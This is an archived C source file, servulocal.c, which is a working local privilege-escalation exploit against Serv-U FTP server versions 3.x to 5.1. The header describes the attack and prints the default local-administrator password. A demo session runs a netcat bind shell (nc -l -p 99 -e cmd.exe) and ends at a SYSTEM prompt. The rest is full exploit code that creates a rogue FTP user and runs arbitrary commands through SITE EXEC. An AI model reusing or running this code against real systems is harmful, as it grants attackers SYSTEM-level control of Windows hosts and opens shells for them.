home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / servu / servulocal.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  8.2 KB  |  228 lines
  1. /*
  2. * Hax0rcitos proudly presents
  3. * Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
  4. *
  5. * All Serv-u Versions have default Login/password for local Administration.
  6. * This account is only available to connect in the loopback interface, so a
  7. * local user will be able to connect to Serv-u with this account and create
  8. * an ftp user with execute rights. after the user is created, just connect
  9. * to the ftp server and execute a raw "SITE EXEC" command. the program will
  10. * be execute with SYSTEM privileges.
  11. *
  12. * Copyright (c) 2003-2004  Haxorcitos.com . All Rights Reserved.
  13. *
  14. * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
  15. * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
  16. * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
  17. *
  18. *
  19. * Date:   10/2003
  20. * Author: Andres Tarasco Acunha
  21. *
  22. * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
  23. *
  24. * Tested Against Serv-u 4.x and v5.1.0.0
  25.  
  26.          G:\exploit\serv-U\local>whoami
  27.         INSANE\aT4r
  28.  
  29.         G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
  30.         Serv-u >3.x Local Exploit by Haxorcitos
  31.  
  32.         <220 Serv-U FTP Server v5.0 for WinSock ready...
  33.         >USER LocalAdministrator
  34.         <331 User name okay, need password.
  35.         ******************************************************
  36.         >PASS #l@$ak#.lk;0@P
  37.         <230 User logged in, proceed.
  38.         ******************************************************
  39.         >SITE MAINTENANCE
  40.         ******************************************************
  41.         [+] Creating New Domain...
  42.         <200-DomainID=3
  43.         220 Domain settings saved
  44.         ******************************************************
  45.         [+] Domain Haxorcitos:3 Created
  46.         [+] Setting New Domain Online
  47.         <220 Server command OK
  48.         ******************************************************
  49.         [+] Creating Evil User
  50.         <200-User=haxorcitos
  51.         200 User settings saved
  52.         ******************************************************
  53.         [+] Now Exploiting...
  54.         >USER haxorcitos
  55.         <331 User name okay, need password.
  56.         ******************************************************
  57.         >PASS whitex0r
  58.         <230 User logged in, proceed.
  59.         ******************************************************
  60.         [+] Now Executing: nc -l -p 99 -e cmd.exe
  61.         <220 Domain deleted
  62.         ******************************************************
  63.          G:\exploit\serv-U\local>nc localhost 99
  64.         Microsoft Windows XP [Version 5.1.2600]
  65.         (C) Copyright 1985-2001 Microsoft Corp.
  66.  
  67.         C:\>whoami
  68.         whoami
  69.         NT AUTHORITY\SYSTEM
  70.          C:\>
  71.   */
  72.  
  73. #include <stdio.h>
  74. #include <stdlib.h>
  75. #include <winsock2.h>
  76. #include <io.h>
  77. #include <process.h>
  78.  
  79. //Responses
  80. #define BANNER                  "220 "
  81. #define USEROK                  "331 User name okay"
  82. #define PASSOK                  "230 User logged in, proceed."
  83. #define ADMOK                   "230-Switching to SYSTEM MAINTENANCE mode."
  84. #define DOMAINID                "200-DomainID="
  85. //Commands
  86.  
  87. #define XPLUSER                    "USER haxorcitos\r\n"
  88. #define XPLPASSWORD                "PASS whitex0r\r\n"
  89. #define USER                    "USER LocalAdministrator\r\n"
  90. #define PASSWORD                "PASS #l@$ak#.lk;0@P\r\n"
  91.  
  92. #define MAINTENANCE             "SITE MAINTENANCE\r\n"
  93. #define EXIT                    "QUIT\r\n"
  94. char newdomain[]="-SETDOMAIN\r\n"
  95.                  "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
  96.                  "-TZOEnable=0\r\n"
  97.                  " TZOKey=\r\n";
  98. /*               "-DynDNSEnable=0\r\n"
  99.                  " DynIPName=\r\n";
  100. */
  101. char deldomain[]="-DELETEDOMAIN\r\n"
  102.                  "-IP=0.0.0.0\r\n"
  103.                  " PortNo=2121\r\n";
  104.  
  105. char newuser[] =
  106.                 "-SETUSERSETUP\r\n"
  107.                 "-IP=0.0.0.0\r\n"
  108.                 "-PortNo=2121\r\n"
  109.                 "-User=haxorcitos\r\n"
  110.                 "-Password=whitex0r\r\n"
  111.                 "-HomeDir=c:\\\r\n"
  112.                 "-LoginMesFile=\r\n"
  113.                 "-Disable=0\r\n"
  114.                 "-RelPaths=1\r\n"
  115.                 "-NeedSecure=0\r\n"
  116.                 "-HideHidden=0\r\n"
  117.                 "-AlwaysAllowLogin=0\r\n"
  118.                 "-ChangePassword=0\r\n"
  119.                 "-QuotaEnable=0\r\n"
  120.                 "-MaxUsersLoginPerIP=-1\r\n"
  121.                 "-SpeedLimitUp=0\r\n"
  122.                 "-SpeedLimitDown=0\r\n"
  123.                 "-MaxNrUsers=-1\r\n"
  124.                 "-IdleTimeOut=600\r\n"
  125.                 "-SessionTimeOut=-1\r\n"
  126.                 "-Expire=0\r\n"
  127.                 "-RatioUp=1\r\n"
  128.                 "-RatioDown=1\r\n"
  129.                 "-RatiosCredit=0\r\n"
  130.                 "-QuotaCurrent=0\r\n"
  131.                 "-QuotaMaximum=0\r\n"
  132.                 "-Maintenance=None\r\n"
  133.                 "-PasswordType=Regular\r\n"
  134.                 "-Ratios=None\r\n"
  135.                 " Access=c:\\|RELP\r\n";
  136.  
  137. #define localport 43958
  138. #define localip "127.0.0.1"
  139.  
  140. char cadena[1024];
  141. int rec,domain;
  142. /******************************************************************************/
  143.  
  144. void ParseCommands(int sock, char *data, int ShowSend, int showResponses, 
  145. char *response) {
  146. send(sock,data,strlen(data),0);
  147. if (ShowSend) printf(">%s",data);
  148. Sleep(100);
  149. do {
  150.          rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
  151.          if (rec<=0) return;
  152.          if (showResponses) printf("<%s",cadena);
  153.          if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
  154.                 domain=atoi(cadena+strlen(DOMAINID));
  155. //} while (strncmp(cadena,response,strlen(response))!=0);
  156. } while (strstr(cadena,response)==NULL);
  157.   printf("******************************************************\r\n");
  158. }
  159. /******************************************************************************/
  160. int main(int argc, char* argv[])
  161. {
  162.         WSADATA ws;
  163.         int sock,sock2;
  164.  
  165.         struct sockaddr_in haxorcitos;
  166.         struct sockaddr_in xpl;
  167.  
  168. printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
  169. if (argc<2) {
  170.         printf("USAGE:   ServuLocal.exe \"command\"\r\n");
  171.         printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
  172.          return(0);
  173. }
  174.  
  175.         if      (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
  176.                 printf(" [-] WSAStartup() error\n");
  177.                 exit(0);
  178.         }
  179.  
  180.         haxorcitos.sin_family = AF_INET;
  181.         haxorcitos.sin_port = htons(localport);
  182.         haxorcitos.sin_addr.s_addr = inet_addr(localip);
  183.         sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
  184.         connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
  185.         rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
  186.         printf("<%s",cadena);
  187.  
  188.         ParseCommands(sock,USER,1,1,USEROK);
  189.         ParseCommands(sock,PASSWORD,1,1,PASSOK);
  190.         ParseCommands(sock,MAINTENANCE,1,0,"230 ");
  191.  
  192.         printf("[+] Creating New Domain...\r\n");
  193.         ParseCommands(sock,newdomain,0,1,BANNER);
  194.         printf("[+] Domain Haxorcitos:%i Created\n",domain);
  195.  
  196. /* Only for v5.x
  197.         printf("[+] Setting New Domain Online\r\n");
  198.         sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n 
  199. Command=DomainOnline\r\n",domain);
  200.         ParseCommands(sock,cadena,0,1,BANNER);
  201. */
  202.         printf("[+] Creating Evil User\r\n");
  203.         ParseCommands(sock,newuser,0,1,"200 ");
  204.         Sleep(1000);
  205.  
  206.         printf("[+] Now Exploiting...\r\n");
  207.         xpl.sin_family = AF_INET;
  208.         xpl.sin_port = htons(2121);
  209.         xpl.sin_addr.s_addr = inet_addr(localip);
  210.         sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
  211.         connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl));
  212.         rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0';
  213.         ParseCommands(sock2,XPLUSER,1,1,USEROK);
  214.         ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
  215.         printf("[+] Now Executing: %s\r\n",argv[1]);
  216.         sprintf(cadena,"site exec %s\r\n",argv[1]);
  217.         send(sock2,cadena,strlen(cadena),0);
  218.         shutdown(sock2,SD_BOTH);
  219.         Sleep(100);
  220.         ParseCommands(sock,deldomain,0,1,BANNER);
  221.         send(sock,EXIT,strlen(EXIT),0);
  222.         shutdown(sock,SD_BOTH);
  223.         closesocket(sock);
  224.         closesocket(sock2);
  225.  
  226.         return 0;
  227. }
  228.